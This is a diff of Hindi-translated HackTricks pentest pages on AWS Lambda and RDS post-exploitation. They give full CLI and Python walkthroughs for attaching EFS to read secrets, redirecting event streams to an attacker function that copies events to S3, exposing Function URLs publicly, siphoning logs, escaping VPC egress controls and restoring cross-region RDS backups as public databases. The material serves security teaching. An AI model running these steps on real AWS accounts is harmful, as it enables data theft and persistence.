+
+
+
 {{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md
new file mode 100644
index 000000000..7394d57a5
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md
@@ -0,0 +1,74 @@
+# AWS Lambda – EFS Mount Injection via UpdateFunctionConfiguration (Data Theft)
+
+`lambda:UpdateFunctionConfiguration` का दुरुपयोग करके एक मौजूदा EFS Access Point को Lambda से attach करें, फिर ऐसा साधारण कोड deploy करें जो mounted path से फ़ाइलें list/read करे ताकि पहले function द्वारा access न की जा सकने वाली shared secrets/config को exfiltrate किया जा सके।
+
+## आवश्यकताएँ
+- पीड़ित account/principal पर Permissions:
+- `lambda:GetFunctionConfiguration`
+- `lambda:ListFunctions` (to find functions)
+- `lambda:UpdateFunctionConfiguration`
+- `lambda:UpdateFunctionCode`
+- `lambda:InvokeFunction`
+- `efs:DescribeMountTargets` (to confirm mount targets exist)
+- पर्यावरण मान्यताएँ:
+- Target Lambda VPC-enabled है और इसके subnets/SGs EFS mount target SG तक TCP/2049 पर पहुँच सकते हैं (उदा. role में AWSLambdaVPCAccessExecutionRole है और VPC routing इसकी अनुमति देता है)।
+- EFS Access Point उसी VPC में होना चाहिए और Lambda subnets के AZs में mount targets होने चाहिए।
+
+## हमला
+- वेरिएबल
+```
+REGION=us-east-1
+TARGET_FN=<target-lambda-name>
+EFS_AP_ARN=<efs-access-point-arn>
+```
+1) EFS Access Point को Lambda से जोड़ें
+```
+aws lambda update-function-configuration \
+--function-name $TARGET_FN \
+--file-system-configs Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht \
+--region $REGION
+# wait until LastUpdateStatus == Successful
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+```
+2) code को एक सरल रीडर से ओवरराइट करें जो फ़ाइलों की सूची दिखाए और संभावित secret/config फ़ाइल के पहले 200 bytes को निहारता है।
+```
+cat > reader.py <<PY
+import os, json
+BASE=/mnt/ht
+
+def lambda_handler(e, c):
+out={ls:[],peek:None}
+try:
+for root, dirs, files in os.walk(BASE):
+for f in files:
+p=os.path.join(root,f)
+out[ls].append(p)
+cand = next((p for p in out[ls] if secret in p.lower() or config in p.lower()), None)
+if cand:
+with open(cand,rb) as fh:
+out[peek] = fh.read(200).decode(utf-8,ignore)
+except Exception as ex:
+out[err]=str(ex)
+return out
+PY
+zip reader.zip reader.py
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://reader.zip --region $REGION
+# If the original handler was different, set it to reader.lambda_handler
+aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+```
+3) Invoke करें और डेटा प्राप्त करें
+```
+aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
+cat /tmp/efs-out.json
+```
+आउटपुट में /mnt/ht के अंतर्गत डायरेक्टरी की सूची और EFS से चुनी हुई secret/config फ़ाइल का छोटा पूर्वावलोकन शामिल होना चाहिए।
+
+## प्रभाव
+सूचीबद्ध permissions वाले attacker arbitrary in-VPC EFS Access Points को victim Lambda functions में mount करके EFS पर संग्रहीत shared configuration और secrets पढ़कर exfiltrate कर सकते हैं, जिन्हें पहले उस function के लिए inaccessible था।
+
+## सफाई
+```
+aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true
+```
+
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md
new file mode 100644
index 000000000..bc954e330
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-event-source-mapping-hijack.md
@@ -0,0 +1,75 @@
+# AWS - Hijack Event Source Mapping के द्वारा Stream/SQS/Kinesis को Attacker Lambda पर Redirect करना
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+`UpdateEventSourceMapping` का दुरुपयोग कर किसी मौजूदा Event Source Mapping (ESM) के target Lambda function को बदलें ताकि DynamoDB Streams, Kinesis, या SQS से रिकॉर्ड attacker-controlled function को डिलीवर हों। यह बिना producers या मूल function के कोड को छुए लाइव डेटा को चुपचाप भटका देता है।
+
+## प्रभाव
+- producer apps या victim code को संशोधित किए बिना मौजूदा streams/queues से लाइव रिकॉर्ड्स को मोड़ना और पढ़ना।
+- victim के ट्रैफ़िक को एक rogue function में प्रोसेस करके संभावित डेटा निष्कासन या लॉजिक में छेड़छाड़।
+
+## आवश्यक अनुमतियाँ
+- `lambda:ListEventSourceMappings`
+- `lambda:GetEventSourceMapping`
+- `lambda:UpdateEventSourceMapping`
+- attacker-controlled Lambda को डिप्लॉय या रेफरेंस करने की क्षमता (`lambda:CreateFunction` या मौजूदा का उपयोग करने की अनुमति)।
+
+## चरण
+
+1) victim function के लिए event source mappings को सूचीबद्ध करें
+```
+TARGET_FN=<victim-function-name>
+aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[].{UUID:UUID,State:State,EventSourceArn:EventSourceArn}'
+export MAP_UUID=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[0].UUID' --output text)
+export EVENT_SOURCE_ARN=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
+--query 'EventSourceMappings[0].EventSourceArn' --output text)
+```
+2) attacker-controlled रिसीवर Lambda तैयार करें (same region; ideally similar VPC/runtime)
+```
+cat > exfil.py <<'PY'
+import json, boto3, os, time
+
+def lambda_handler(event, context):
+print(json.dumps(event)[:3000])
+b = os.environ.get('EXFIL_S3')
+if b:
+k = f"evt-{int(time.time())}.json"
+boto3.client('s3').put_object(Bucket=b, Key=k, Body=json.dumps(event))
+return {'ok': True}
+PY
+zip exfil.zip exfil.py
+ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-(and optional S3)-permissions>
+export ATTACKER_FN_ARN=$(aws lambda create-function \
+--function-name ht-esm-exfil \
+--runtime python3.11 --role $ATTACKER_LAMBDA_ROLE_ARN \
+--handler exfil.lambda_handler --zip-file fileb://exfil.zip \
+--query FunctionArn --output text)
+```
+3) mapping को attacker function की ओर पुनर्निर्देशित करें
+```
+aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $ATTACKER_FN_ARN
+```
+4) स्रोत पर एक इवेंट जनरेट करें ताकि mapping ट्रिगर हो (उदाहरण: SQS)
+```
+SOURCE_SQS_URL=<queue-url>
+aws sqs send-message --queue-url $SOURCE_SQS_URL --message-body '{"x":1}'
+```
+5) सत्यापित करें कि attacker function बैच प्राप्त करता है
+```
+aws logs filter-log-events --log-group-name /aws/lambda/ht-esm-exfil --limit 5
+```
+6) वैकल्पिक stealth
+```
+# Pause mapping while siphoning events
+aws lambda update-event-source-mapping --uuid $MAP_UUID --enabled false
+
+# Restore original target later
+aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $TARGET_FN --enabled true
+```
+नोट:
+- SQS ESMs के लिए, queue को process कर रहे Lambda की execution role को `sqs:ReceiveMessage`, `sqs:DeleteMessage`, और `sqs:GetQueueAttributes` की आवश्यकता होती है (प्रबंधित नीति: `AWSLambdaSQSQueueExecutionRole`).
+- ESM UUID वही रहता है; केवल इसका `FunctionArn` बदला जाता है, इसलिए producers और source ARNs अपरिवर्तित रहते हैं.
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md
new file mode 100644
index 000000000..734300aa7
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md
@@ -0,0 +1,46 @@
+# AWS - Lambda Function URL सार्वजनिक एक्सपोजर (AuthType NONE + Public Invoke Policy)
+
+एक private Lambda Function URL को public unauthenticated endpoint में बदलें: Function URL का AuthType को NONE में स्विच करें और एक resource-based policy अटैच करें जो lambda:InvokeFunctionUrl को सभी को देती है। इससे internal functions को anonymous रूप से invoke किया जा सकता है और संवेदनशील backend operations उजागर हो सकते हैं।
+
+## दुरुपयोग
+
+- पूर्व-आवश्यकताएँ: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
+- Region: us-east-1
+
+### कदम
+1) सुनिश्चित करें कि function के पास एक Function URL है (डिफ़ॉल्ट रूप से AWS_IAM):
+```
+aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
+```
+
+2) URL को public में बदलें (AuthType NONE):
+```
+aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE
+```
+
+3) unauthenticated principals को अनुमति देने के लिए एक resource-based policy statement जोड़ें:
+```
+aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE
+```
+
+4) URL प्राप्त करें और credentials के बिना invoke करें:
+```
+URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
+curl -sS "$URL"
+```
+
+### प्रभाव
+- Lambda function इंटरनेट पर anonymously उपलब्ध हो जाता है।
+
+### उदाहरण आउटपुट (unauthenticated 200)
+```
+HTTP 200
+https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
+{"message": "HackTricks demo: public Function URL reached", "timestamp": 1759761979, "env_hint": "us-east-1", "event_keys": ["version", "routeKey", "rawPath", "rawQueryString", "headers", "requestContext", "isBase64Encoded"]}
+```
+### सफाई
+```
+aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
+aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
+```
+
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md
new file mode 100644
index 000000000..633894118
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-loggingconfig-redirection.md
@@ -0,0 +1,51 @@
+# AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+`lambda:UpdateFunctionConfiguration` के advanced logging controls का दुरुपयोग करके किसी function के logs को attacker-चुने हुए CloudWatch Logs log group पर redirect करें। यह code या execution role बदलने के बिना काम करता है (ज़्यादातर Lambda roles पहले से `AWSLambdaBasicExecutionRole` के माध्यम से `logs:CreateLogGroup/CreateLogStream/PutLogEvents` शामिल करते हैं)। अगर function secrets/request bodies print करता है या stack traces के साथ crash होता है, तो आप उन्हें नए log group से इकट्ठा कर सकते हैं।
+
+## आवश्यक अनुमतियाँ
+- lambda:UpdateFunctionConfiguration
+- lambda:GetFunctionConfiguration
+- lambda:InvokeFunction (या मौजूदा triggers पर निर्भर करें)
+- logs:CreateLogGroup (अक्सर आवश्यक नहीं होता यदि function role में यह मौजूद हो)
+- logs:FilterLogEvents (इवेंट पढ़ने के लिए)
+
+## चरण
+1) एक sink log group बनाएं
+```
+aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
+```
+2) लक्षित function logs को पुनर्निर्देशित करें
+```
+aws lambda update-function-configuration \
+--function-name <TARGET_FN> \
+--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
+--region us-east-1
+```
+इंतज़ार करें जब तक `LastUpdateStatus` `Successful` न हो:
+```
+aws lambda get-function-configuration --function-name <TARGET_FN> \
+--query LastUpdateStatus --output text
+```
+3) sink को कॉल करें और उससे पढ़ें
+```
+aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
+sleep 5
+aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
+```
+## प्रभाव
+- गुप्त रूप से सभी एप्लिकेशन/सिस्टम लॉग्स को आपके नियंत्रित log group में पुनर्निर्देशित करना, जिससे यह अपेक्षा टाली जा सके कि लॉग्स केवल `/aws/lambda/<fn>` में ही landen।
+- Exfiltrate उस संवेदनशील डेटा को जो फ़ंक्शन द्वारा प्रिंट किया गया हो या त्रुटियों (errors) में प्रकट हुआ हो।
+
+## सफाई
+```
+aws lambda update-function-configuration --function-name <TARGET_FN> \
+--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
+--region us-east-1 || true
+```
+## नोट्स
+- लॉगिंग नियंत्रण Lambda के `LoggingConfig` (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel) का हिस्सा हैं।
+- डिफ़ॉल्ट रूप से, Lambda लॉग्स `/aws/lambda/<function>` पर भेजता है, लेकिन आप किसी भी log group नाम की ओर निर्देशित कर सकते हैं; Lambda (या execution role) इसे बना देगा यदि अनुमति हो।
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md
new file mode 100644
index 000000000..8dae8fba6
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md
@@ -0,0 +1,12 @@
+# AWS Lambda – Runtime Pinning/Rollback Abuse via PutRuntimeManagementConfig
+
+Abuse `lambda:PutRuntimeManagementConfig` करके किसी function को एक विशिष्ट runtime version (Manual) पर पिन करें या अपडेट्स को फ्रीज़ करें (FunctionUpdate)। यह malicious layers/wrappers के साथ संगतता बनाए रखता है और फ़ंक्शन को एक पुरानी, कमजोर runtime पर रोक कर exploitation और लंबी अवधि की persistence में मदद कर सकता है।
+
+आवश्यकताएँ: `lambda:InvokeFunction`, `logs:FilterLogEvents`, `lambda:PutRuntimeManagementConfig`, `lambda:GetRuntimeManagementConfig`.
+
+उदाहरण (us-east-1):
+- इवोक (Invoke): `aws lambda invoke --function-name  /tmp/ping.json --payload {} --region us-east-1 > /dev/null; sleep 5`
+- अपडेट फ्रीज़ करें (Freeze updates): `aws lambda put-runtime-management-config --function-name  --update-runtime-on FunctionUpdate --region us-east-1`
+- सत्यापित करें (Verify): `aws lambda get-runtime-management-config --function-name  --region us-east-1`
+
+वैकल्पिक रूप से, INIT_START logs से Runtime Version ARN निकालकर और `--update-runtime-on Manual --runtime-version-arn <arn>` का उपयोग करके किसी विशिष्ट runtime version पर पिन करें।
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md
new file mode 100644
index 000000000..3c3e4c8a9
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md
@@ -0,0 +1,63 @@
+# AWS Lambda – VPC Egress Bypass by Detaching VpcConfig
+
+एक Lambda फ़ंक्शन को प्रतिबंधित VPC से बाहर निकालें, इसकी configuration को खाली VpcConfig (SubnetIds=[], SecurityGroupIds=[]) से अपडेट करके। इसके बाद फ़ंक्शन Lambda-managed networking plane में चलेगा, बाहरी इंटरनेट पहुँच पुनः प्राप्त करेगा और उन egress controls को बाइपास करेगा जिन्हें private VPC subnets (NAT के बिना) द्वारा लागू किया गया था।
+
+## इसका दुरुपयोग
+
+- Pre-reqs: lambda:UpdateFunctionConfiguration on the target function (and lambda:InvokeFunction to validate), plus permissions to update code/handler if changing them.
+- Assumptions: फ़ंक्शन वर्तमान में VpcConfig के साथ कॉन्फ़िगर है जो NAT के बिना private subnets की ओर इशारा करता है (इसलिए बाहरी इंटरनेट अवरुद्ध है)।
+- Region: us-east-1
+
+### चरण
+
+0) एक न्यूनतम handler तैयार करें जो प्रमाणित करे कि बाहरी HTTP काम करता है
+
+cat > net.py <<'PY'
+import urllib.request, json
+
+def lambda_handler(event, context):
+try:
+ip = urllib.request.urlopen('https://checkip.amazonaws.com', timeout=3).read().decode().strip()
+return {"egress": True, "ip": ip}
+except Exception as e:
+return {"egress": False, "err": str(e)}
+PY
+zip net.zip net.py
+aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://net.zip --region $REGION || true
+aws lambda update-function-configuration --function-name $TARGET_FN --handler net.lambda_handler --region $REGION || true
+
+1) वर्तमान VPC कॉन्फ़िग रिकॉर्ड करें (जरूरत पड़ने पर बाद में पुनर्स्थापित करने के लिए)
+
+aws lambda get-function-configuration --function-name $TARGET_FN --query 'VpcConfig' --region $REGION > /tmp/orig-vpc.json
+cat /tmp/orig-vpc.json
+
+2) खाली सूचियाँ सेट करके VPC अलग करें
+
+aws lambda update-function-configuration \
+--function-name $TARGET_FN \
+--vpc-config SubnetIds=[],SecurityGroupIds=[] \
+--region $REGION
+until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
+
+3) Invoke करें और बाहरी पहुंच सत्यापित करें
+
+aws lambda invoke --function-name $TARGET_FN /tmp/net-out.json --region $REGION >/dev/null
+cat /tmp/net-out.json
+
+(Optional) मूल VPC कॉन्फ़िग पुनर्स्थापित करें
+
+if jq -e '.SubnetIds | length > 0' /tmp/orig-vpc.json >/dev/null; then
+SUBS=$(jq -r '.SubnetIds | join(",")' /tmp/orig-vpc.json); SGS=$(jq -r '.SecurityGroupIds | join(",")' /tmp/orig-vpc.json)
+aws lambda update-function-configuration --function-name $TARGET_FN --vpc-config SubnetIds=[$SUBS],SecurityGroupIds=[$SGS] --region $REGION
+fi
+
+### प्रभाव
+- फ़ंक्शन से अनियंत्रित बाहरी इंटरनेट पहुँच पुनः प्राप्त होती है, जिससे उन workloads से data exfiltration या C2 संभव हो जाता है जिन्हें जानबूझकर NAT के बिना private subnets में अलग-थलग किया गया था।
+
+### उदाहरण आउटपुट (VpcConfig अलग करने के बाद)
+
+{"egress": true, "ip": "34.x.x.x"}
+
+### क्लीनअप
+- यदि आपने कोई अस्थायी code/handler परिवर्तन किया है, तो उन्हें पुनर्स्थापित करें।
+- वैकल्पिक रूप से ऊपर दिखाए अनुसार /tmp/orig-vpc.json में सहेजे गए मूल VpcConfig को पुनर्स्थापित करें।
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
index b426be805..261acb6e8 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md
@@ -1,4 +1,4 @@
-# AWS - RDS पोस्ट एक्सप्लॉइटेशन
+# AWS - RDS Post Exploitation
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -12,7 +12,7 @@
 
 ### `rds:CreateDBSnapshot`, `rds:RestoreDBInstanceFromDBSnapshot`, `rds:ModifyDBInstance`
 
-यदि हमलावर के पास पर्याप्त अनुमतियाँ हैं, तो वह **DB को सार्वजनिक रूप से सुलभ** बना सकता है, DB का स्नैपशॉट बनाकर, और फिर स्नैपशॉट से एक सार्वजनिक रूप से सुलभ DB बनाकर।
+If the attacker has enough permissions, he could make a **DB सार्वजनिक रूप से सुलभ** by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
 ```bash
 aws rds describe-db-instances # Get DB identifier
 
@@ -40,9 +40,9 @@ aws rds modify-db-instance \
 ```
 ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
 
-इन अनुमतियों के साथ एक हमलावर **DB का स्नैपशॉट बना सकता है** और इसे **सार्वजनिक रूप से** **उपलब्ध** कर सकता है। फिर, वह उस स्नैपशॉट से अपने खाते में एक DB बना सकता है।
+एक हमलावर के पास ये permissions होने पर वह एक DB का **snapshot** बना सकता है और उसे **publicly** **available** कर सकता है। फिर वह अपने ही account में उस snapshot से एक DB बना सकता है।
 
-यदि हमलावर के पास **`rds:CreateDBSnapshot`** नहीं है, तो भी वह **अन्य** बनाए गए स्नैपशॉट्स को **सार्वजनिक** बना सकता है।
+यदि हमलावर के पास `rds:CreateDBSnapshot` नहीं है, तब भी वह अन्य बनाए गए snapshots को **public** कर सकता है।
 ```bash
 # create snapshot
 aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
@@ -53,30 +53,114 @@ aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --
 ```
 ### `rds:DownloadDBLogFilePortion`
 
-`rds:DownloadDBLogFilePortion` अनुमति वाला एक हमलावर **RDS इंस्टेंस के लॉग फ़ाइलों के हिस्से डाउनलोड कर सकता है**। यदि संवेदनशील डेटा या पहुँच क्रेडेंशियल्स गलती से लॉग किए जाते हैं, तो हमलावर इस जानकारी का उपयोग अपने विशेषाधिकारों को बढ़ाने या अनधिकृत क्रियाएँ करने के लिए कर सकता है।
+जिसके पास `rds:DownloadDBLogFilePortion` अनुमति है, वह किसी RDS instance की लॉग फ़ाइलों के हिस्से **डाउनलोड** कर सकता है। यदि संवेदनशील डेटा या access credentials गलती से लॉग हो गए हों, तो हमलावर इन जानकारियों का उपयोग करके अपने अधिकार बढ़ा सकता है या अनधिकृत क्रियाएँ कर सकता है।
 ```bash
 aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
 ```
-**संभावित प्रभाव**: संवेदनशील जानकारी तक पहुँच या लीक किए गए क्रेडेंशियल्स का उपयोग करके अनधिकृत क्रियाएँ।
+**संभावित प्रभाव**: leaked credentials का उपयोग करके संवेदनशील जानकारी तक पहुँच या अनधिकृत कार्रवाइयाँ।
 
 ### `rds:DeleteDBInstance`
 
-इन अनुमतियों के साथ एक हमलावर **मौजूदा RDS इंस्टेंस को DoS कर सकता है**।
+इन अनुमतियों वाले हमलावर **DoS existing RDS instances** कर सकते हैं।
 ```bash
 # Delete
 aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
 ```
-**संभावित प्रभाव**: मौजूदा RDS उदाहरणों का हटाना, और डेटा का संभावित नुकसान।
+**Potential impact**: मौजूदा RDS instances का हटना, और संभावित डेटा हानि।
 
 ### `rds:StartExportTask`
 
 > [!NOTE]
-> TODO: परीक्षण करें
+> TODO: परीक्षण
 
-इस अनुमति के साथ एक हमलावर **RDS उदाहरण स्नैपशॉट को S3 बकेट में निर्यात कर सकता है**। यदि हमलावर के पास गंतव्य S3 बकेट पर नियंत्रण है, तो वे निर्यात किए गए स्नैपशॉट के भीतर संवेदनशील डेटा तक पहुंच प्राप्त कर सकते हैं।
+यह अनुमति रखने वाला एक हमलावर **export an RDS instance snapshot to an S3 bucket** कर सकता है। यदि हमलावर के पास गंतव्य S3 bucket पर नियंत्रण है, तो वे निर्यातित RDS instance snapshot के भीतर संवेदनशील डेटा तक संभावित रूप से पहुँच सकते हैं।
 ```bash
 aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
 ```
-**संभावित प्रभाव**: निर्यातित स्नैपशॉट में संवेदनशील डेटा तक पहुंच। 
+**Potential impact**: एक्सपोर्ट किए गए snapshot में संवेदनशील डेटा तक पहुँच।
+
+### Cross-Region Automated Backups Replication for Stealthy Restore (`rds:StartDBInstanceAutomatedBackupsReplication`)
+
+क्रॉस-रीजन ऑटोमेटेड बैकअप्स रिप्लिकेशन का दुरुपयोग करके चुपके से किसी RDS instance के automated backups को दूसरी AWS Region में डुप्लिकेट करें और वहां restore करें। attacker फिर restored DB को सार्वजनिक रूप से उपलब्ध बना सकता है और master password रिसेट करके डेटा को उस Region से बाहर एक्सेस कर सकता है जिस Region की defenders निगरानी नहीं कर रहे होंगे।
+
+Permissions needed (minimum):
+- `rds:StartDBInstanceAutomatedBackupsReplication` in the destination Region
+- `rds:DescribeDBInstanceAutomatedBackups` in the destination Region
+- `rds:RestoreDBInstanceToPointInTime` in the destination Region
+- `rds:ModifyDBInstance` in the destination Region
+- `rds:StopDBInstanceAutomatedBackupsReplication` (optional cleanup)
+- `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress` (रिस्टोर की गई DB को एक्सपोज़ करने के लिए)
+
+Impact: प्रोडक्शन डेटा की एक कॉपी को दूसरी Region में restore करके और attacker-नियंत्रित क्रेडेंशियल्स के साथ उसे सार्वजनिक रूप से एक्सपोज़ करके persistence और डेटा exfiltration।
+
+<details>
+<summary>End-to-end CLI (replace placeholders)</summary>
+```bash
+# 1) Recon (SOURCE region A)
+aws rds describe-db-instances \
+--region <SOURCE_REGION> \
+--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
+--output table
+
+# 2) Start cross-Region automated backups replication (run in DEST region B)
+aws rds start-db-instance-automated-backups-replication \
+--region <DEST_REGION> \
+--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
+--source-region <SOURCE_REGION> \
+--backup-retention-period 7
+
+# 3) Wait for replication to be ready in DEST
+aws rds describe-db-instance-automated-backups \
+--region <DEST_REGION> \
+--query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
+--output table
+# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn
+
+# 4) Restore to latest restorable time in DEST
+aws rds restore-db-instance-to-point-in-time \
+--region <DEST_REGION> \
+--source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
+--target-db-instance-identifier <TARGET_DB_ID> \
+--use-latest-restorable-time \
+--db-instance-class db.t3.micro
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 5) Make public and reset credentials in DEST
+# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
+OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
+--group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
+--query GroupId --output text)
+aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
+--group-id "$OPEN_SG_ID" \
+--ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'
+
+# 5b) Publicly expose restored DB and attach the SG
+aws rds modify-db-instance --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--publicly-accessible \
+--vpc-security-group-ids "$OPEN_SG_ID" \
+--apply-immediately
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 5c) Reset the master password
+aws rds modify-db-instance --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--master-user-password '<NEW_STRONG_PASSWORD>' \
+--apply-immediately
+aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
+
+# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
+ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
+--db-instance-identifier <TARGET_DB_ID> \
+--query 'DBInstances[0].Endpoint.Address' --output text)
+mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'
+
+# 7) Optional: stop replication
+aws rds stop-db-instance-automated-backups-replication \
+--region <DEST_REGION> \
+--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
+```
+</details>
+
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
index 6d41f887b..44489d381 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
@@ -4,7 +4,7 @@
 
 ## lambda
 
-lambda के बारे में अधिक जानकारी:
+More info about lambda in:
 
 {{#ref}}
 ../aws-services/aws-lambda-enum.md
@@ -12,11 +12,11 @@ lambda के बारे में अधिक जानकारी:
 
 ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
 
-जिन उपयोगकर्ताओं के पास **`iam:PassRole`, `lambda:CreateFunction`, और `lambda:InvokeFunction`** अनुमतियाँ हैं, वे अपनी विशेषताओं को बढ़ा सकते हैं।\
